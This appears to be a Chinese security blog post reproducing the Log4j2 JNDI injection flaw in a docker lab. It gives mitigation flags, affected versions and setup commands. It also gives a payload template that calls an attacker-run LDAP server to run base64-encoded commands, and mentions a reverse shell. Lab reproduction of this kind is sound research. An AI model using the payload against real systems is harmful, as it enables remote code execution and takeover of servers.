核弹级log4j命令注入漏洞复现（内附工具）

1

免责声明

本公众号提供的工具、教程、学习路线、精品文章均为原创或互联网收集，旨在提高网络安全技术水平为目的，只做技术研究，谨遵守国家相关法律法规，请勿用于违法用途，如果您对文章内容有疑问，可以尝试加入交流群讨论或留言私信，如有侵权请联系小编处理。

2

内容速览

漏洞描述

长话短说吧。相信大家已经被 Log4j2 的重大漏洞刷屏了，估计有不少小伙伴此前为了修 bug 已经累趴下了。很不幸，我的 Spring Boot 项目中恰好用的就是 Log4j2，版本还真是 2.14.1，在这次漏洞波及的版本范围之内。

第一时间从网上得知这个漏洞的消息后，我找了一些临时性的建议，比如说：

JVM 参数添加 -Dlog4j2.formatMsgNoLookups=true
log4j2.formatMsgNoLookups=True
FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 设置为true

此后，时刻关注着 Log4j2 的官网和 Spring Boot GitHub 仓库的最新消息。

Java 后端开发的小伙伴应该都知道，Log4j、SLF4J、Logback 这 3 个日志组件是一个爹——Ceki Gulcu，但 Log4j 2 却是例外，它是 Apache 基金会的产品。

所以这波超级高危漏洞的锅必须得由 Apache 来背。并且波及范围非常广，已知受影响的应用程序和组件有：

• Spring-boot-strater-log4j2- Apache Solr
• Apache Flink- Apache Druid并且只要是在 Log4j 2.x <= 2.14.1 之间的版本，都将受到影响——注定被载入史册的一波 bug 啊。

目前，Log4j2 的官网已经发布了 Log4j2 2.15.0 正式版，来解决此次漏洞。

影响范围：

Apache Log4j 2.x < 2.15.0-rc2

Apache Log4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。

Spring-Boot-strater-log4j2、Apache Struts2、Apache Solr、Apache Flink、Apache Druid、ElasticSearch、Flume、Dubbo、Redis、Logstash、Kafka均受影响。

环境搭建：

使用Log4j2漏洞环境进行复现，环境下载地址：

https://github.com/fengxuangit/log4j_vuln

docker创建环境命令:

docker pull registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln
docker run -it -d -p 8080:8080 --name log4j_vuln_container registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln 
docker exec -it log4j_vuln_container /bin/bash
/bin/bash /home/apache-tomcat-8.5.45/bin/startup.sh

使用本地kali服务器docker拉取环境。

环境启动成功后，访问http://127.0.0.1/webstudy/hello-fengxuan，漏洞post参数为c。

漏洞复现

漏洞环境部署完毕后。首先需要一台公网vps（开启ldap服务、接受反弹shell）

vps起ldap服务，工具地址：https://github.com/zzwlpx/JNDIExploit

ldap服务启动之后，去抓包发送payload，把要执行的命令base64加密后放入payload中。

先创建一个文件touch /tmp/123 发送payload。

payload为 ${jndi:ldap://x❌x❌1389/Basic/Command/Base64/base64命令}

vps上的 JNDIExploit监听已经接收到了恶意请求。

查看docker镜像/tmp路径，123文件创建成功

反弹shell同理，将反弹shell命令base64加密后放入payload发送

反弹shell成功

仅用于本地验证测试，禁止非法渗透测试